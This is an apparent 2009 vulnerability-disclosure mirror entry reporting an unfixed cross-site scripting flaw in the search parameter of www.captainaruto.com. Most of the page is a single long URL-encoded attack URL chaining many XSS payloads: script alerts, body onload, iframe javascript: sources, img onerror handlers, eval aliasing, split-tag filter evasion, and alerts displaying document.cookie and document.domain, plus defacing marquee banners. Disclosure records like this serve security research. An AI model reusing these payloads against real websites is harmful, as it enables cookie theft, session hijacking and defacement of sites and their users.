Security researcher Mystick, has submitted on 01/02/2009 a cross-site-scripting (XSS) vulnerability affecting www.captainaruto.com, which at the time of submission ranked 8106 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 03/02/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 01/02/2009 |
Date published: 03/02/2009 |
Fixed? Mail us! | Status: UNFIXED |
Author: Mystick |
Domain: www.captainaruto.com |
Category: XSS |
Pagerank: 8106 |
URL: http://www.captainaruto.com/recherche?q=%20%27%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83)) %3C/SCRIPT%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20By%20Mystick%3C/H1%3E%3C/MARQUEE%3E%27%2 2%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3 CH1%3EXSS%20By%20Mystick%3C/H1%3E%3C/MARQUEE%3E%27%22%3E%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert(%22XS S%22)%3C/SCRIPT%3E%22%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20By%20Mystick%3C/H1%3E%3C/MARQ UEE%3E%27%22%3E%3C%3CSCRIPT%3Ealert(%22XSS%22);//%3C%3C/SCRIPT%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3 CH1%3EXSS%20By%20Mystick%3C/H1%3E%3C/MARQUEE%3E%27%22%3E%3C/TITLE%3E%3CSCRIPT%3Ealert(%22XSS%22);%3C /SCRIPT%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20By%20Mystick%3C/H1%3E%3C/MARQUEE%3E%27%22%3 E%3CBODY%20ONLOAD=alert(%27XSS%27)%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20By%20Mystick%3C/ H1%3E%3C/MARQUEE%3E%27%22%3E%3CIFRAME%20SRC=%22javascript:alert(%27XSS%27);%22%3E%3C/IFRAME%3E%3CMAR QUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20By%20Mystick%3C/H1%3E%3C/MARQUEE%3E}%3C/style%3E%3Cscript%3 Ea=eval;b=alert;a(b(/XSS/.source));%3C/script%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20By%20 Mystick%3C/H1%3E%3C/MARQUEE%3E%27%22%3E%3C/textarea%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E%3CMARQUE E%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20By%20Mystick%3C/H1%3E%3C/MARQUEE%3E%27%22%3E%3Cimg%20src=foo.p ng%20onerror=alert(/XSS/)%20/%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20By%20Mystick%3C/H1%3E %3C/MARQUEE%3E%22/%3E%3C/a%3E%3C/%3E%3Cimg%20src=1.gif%20onerror=alert(501337)%3E%3CMARQUEE%20BGCOLO R=%22RED%22%3E%3CH1%3EXSS%20By%20Mystick%3C/H1%3E%3C/MARQUEE%3E%27%22%3E%3Cscript%3Ealert(document.d omain)%3C/script%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20By%20Mystick%3C/H1%3E%3C/MARQUEE%3 E%27%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXS S%20By%20Mystick%3C/H1%3E%3C/MARQUEE%3E%27%22%3E%3Cscript%3Ealert(document.referrer)%3C/script%3E%3C MARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20By%20Mystick%3C/H1%3E%3C/MARQUEE%3E%27%22%3E%3Cscript%3E alert(navigator.userAgent)%3C/script%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20By%20Mystick%3 C/H1%3E%3C/MARQUEE%3E%27%22%3E%3Cscript%3Ealert(0)%3C/script%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH 1%3EXSS%20By%20Mystick%3C/H1%3E%3C/MARQUEE%3E%27%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E%3CMA RQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20By%20Mystick%3C/H1%3E%3C/MARQUEE%3E%27%22%3E%3Cscr%3Cscrip t%3Eipt%3Ealert(%27XSS%27);%3C/scr%3C/script%3Eipt%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20 By%20Mystick%3C/H1%3E%3C/MARQUEE%3E%27%22%3E%3Cmarquee%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E%3 C/marquee%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20By%20Mystick%3C/H1%3E%3C/MARQUEE%3E%3C?%2 0echo(%27%3Cscr)%27;echo(%27ipt%3Ealert(\%22XSS\%22)%3C/script%3E%27);%20?%3E%3CMARQUEE%20BGCOLOR=%2 2RED%22%3E%3CH1%3EXSS%20By%20Mystick%3C/H1%3E%3C/MARQUEE%3E |
Click here to view the mirror
|
|
|